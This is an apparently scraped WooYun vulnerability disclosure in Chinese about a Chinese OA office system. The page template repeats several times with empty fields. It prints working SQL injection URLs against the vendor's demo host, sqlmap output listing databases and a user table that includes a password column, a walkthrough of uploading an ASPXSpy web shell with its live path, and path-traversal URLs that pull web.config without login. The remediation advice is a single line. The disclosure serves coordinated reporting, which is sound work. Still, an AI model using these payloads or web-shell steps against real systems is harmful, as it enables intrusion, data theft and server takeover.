某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066562

漏洞标题：某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包

漏洞作者： xfkxfk

提交时间：2014-06-28 19:02

修复时间：2014-09-26 19:04

公开时间：2014-09-26 19:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-28：细节已通知厂商并且等待厂商处理中
2014-07-03：厂商已经确认，细节仅向厂商公开
2014-07-06：细节向第三方安全合作伙伴开放
2014-08-27：细节向核心白帽子及相关领域专家公开
2014-09-06：细节向普通白帽子公开
2014-09-16：细节向实习白帽子公开
2014-09-26：细节向公众公开

简要描述：

某OA系统多处SQL注入可拖库，任意文件上传GetShell，无需登录任意文件下载漏洞打包

详细说明：

官网：http://www.kmpsoft.com/index.htm
VOA协同办公系统
官方案例：http://www.kmpsoft.com/solution.htm
官方案例还是很多的，而且大量政府，事业单位，教育等多个行业。
官方demo地址：http://demo.kmpsoft.com/
0x001 SQL注入漏洞
第一处SQL注入
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -
第二处SQL注入
http://demo.kmpsoft.com/Archive/send/send.aspx?mode=3&oid=a8b011b7-e7b7-43df-a162-6ae5523f1494' and db_name()>0 -- -
第三处SQL注入
http://demo.kmpsoft.com/rules/rules.aspx?mode=3&oid=8eeb9c5b-6daa-410f-a90c-f895ad2e7aae' and db_name()>0 -- -
这里以第一处为例：
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -

http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and (select @@version)>0 -- -

数据库信息如下：

---
Place: GET
Parameter: oid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' AND 1359=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1359=1359) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(100)+CHAR(122)+CHAR(113))) AND 'qTcd'='qTcd
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [41]:
[*] a0105132537
[*] a0108141913
[*] a0110103200
[*] a0206163737
[*] a0218231819
[*] a0220011230
[*] a0220171713
[*] a0221141636
[*] a0221171518
[*] a0221213002
[*] a0318150035
[*] a0401093038
[*] a0401230533
[*] a041621560
[*] a04251542211
[*] a0515171406
[*] a0719175457
[*] a0927092040
[*] a0927112531
[*] a1006105224
[*] a1012122304
[*] a1015112018
[*] a1015144816
[*] a1015153226
[*] a1015173249
[*] a1015211359
[*] a1016000522
[*] a1129141738
[*] a1202124725
[*] a1213095801
[*] a1222113403
[*] a1222163828
[*] a1222171342
[*] a1224140353
[*] a1227184632659
[*] a1229110908
[*] a123456700
[*] master
[*] model
[*] msdb
[*] tempdb

当前数据库
Database: a0719175457
[191 tables]
192个表就不依依列出来了，看看myUser表的结构予以证明：

Database: a0719175457
Table: myUser
[28 columns]
+--------------------+------------------+
| Column             | Type             |
+--------------------+------------------+
| ADAccount          | varchar          |
| BUGUID             | uniqueidentifier |
| Comments           | varchar          |
| CreatedBy          | uniqueidentifier |
| CreatedOn          | datetime         |
| DefaultStationGUId | uniqueidentifier |
| DepartmentGUID     | uniqueidentifier |
| DisabledReason     | varchar          |
| Email              | varchar          |
| HomePhone          | varchar          |
| IsAdmin            | bit              |
| IsDisabeld         | bit              |
| IsSaler            | bit              |
| JobNumber          | varchar          |
| JobTitle           | varchar          |
| keyWords           | nvarchar         |
| MobilePhone        | varchar          |
| ModifiedBy         | uniqueidentifier |
| ModifiedOn         | varchar          |
| OfficePhone        | varchar          |
| OrderCode          | nvarchar         |
| ParentGUID         | uniqueidentifier |
| Password           | varchar          |
| PhotoUrl           | varchar          |
| UserCode           | varchar          |
| UserGUID           | uniqueidentifier |
| UserName           | varchar          |
| UserProject        | varchar          |
+--------------------+------------------+

0x002 任意文件上传GetShell
个人办公——个人文件柜——我的文件——新增——附件——上传
这里上传没有做任何限制，直接上传aspx文件
这里我们上传ASPXSpy.apsx文件：

上传后查看页面源代码得到上传后文件的fileanme=2014628164329.aspx：

但是不知道上传后的路径，扫一下路径看看有什么upload/uploadfile/等这些目录

upfiles访问403，应该就这个目录了，试一下，果然成功了！
shell地址：http://demo.kmpsoft.com/upfiles/2014628164329.aspx

0x003 无需登录任意文件下载漏洞
这里的任意文件下载无需登录，直接下载，导致系统源代码，系统配置文件，账户信息大量泄漏
http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=UpFile_Main_Down.aspx&p_filename=../_controls/upfile/UpFile_Main_Down.aspx&p_open_type=_blank&random=0.6767177609908288

http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=web.config&p_filename=../web.config&p_open_type=_blank&random=0.6767177609908288

数据库等敏感信息泄漏

漏洞证明：

修复方案：

严格过滤，严格控制上传，控制权限，控制下载文件路径等

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2014-07-03 11:23

厂商回复：

CNVD确认所述DEMO情况，目前难以找到应用实例情况，已经由CNVD直接联系软件生产厂商，深圳市鹏威信息技术有限公司，电话至0755-8661****（对方称不需要），后将通报发送至网站邮箱market 中处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066562

漏洞标题：某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包

相关厂商：cncert国家互联网应急中心

漏洞作者： xfkxfk

提交时间：2014-06-28 19:02

修复时间：2014-09-26 19:04

公开时间：2014-09-26 19:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066562

漏洞标题：某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包

相关厂商：cncert国家互联网应急中心

漏洞作者： xfkxfk

提交时间：2014-06-28 19:02

修复时间：2014-09-26 19:04

公开时间：2014-09-26 19:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-066562"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：